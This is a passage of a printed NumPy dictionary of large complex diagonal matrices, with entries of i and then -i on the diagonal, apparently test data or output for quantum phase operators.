0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j]]),
7: array([[0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
